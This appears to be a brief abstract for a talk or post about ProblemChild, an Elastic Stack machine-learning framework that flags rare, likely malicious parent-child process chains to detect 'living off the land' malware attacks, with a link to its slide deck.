When it comes to malware attacks, one of the more common techniques is “living off the land.” Attackers utilize standard programs/processes to execute these attacks, blending into an existing environment to avoid detection. ProblemChild aims to help detect these types of attacks by identifying rare parent-child process chains and suppressing commonly occurring ones since rarely spawned processes in an environment (and more so from a specific parent process) could indicate malicious activity. The ProblemChild framework identifies these anomalous chains by leveraging multiple Machine Learning capabilities in the Elastic Stack to produce an anomaly score for each process event chain. We derive the anomaly score by optimizing two components: maliciousness and prevalence. We first utilize the Stack Data Frame Analytics module to train a supervised model on process event data to classify events as malicious or benign. Processes marked malicious by the supervised model are then polled using the Stack’s Anomaly Detection module to determine the “rarest malicious processes” in the environment. Flagging rare malicious processes helps security/malware analysts prioritize events for analysis.

Please view the slide deck here: https://ela.st/problemchild-slidedeck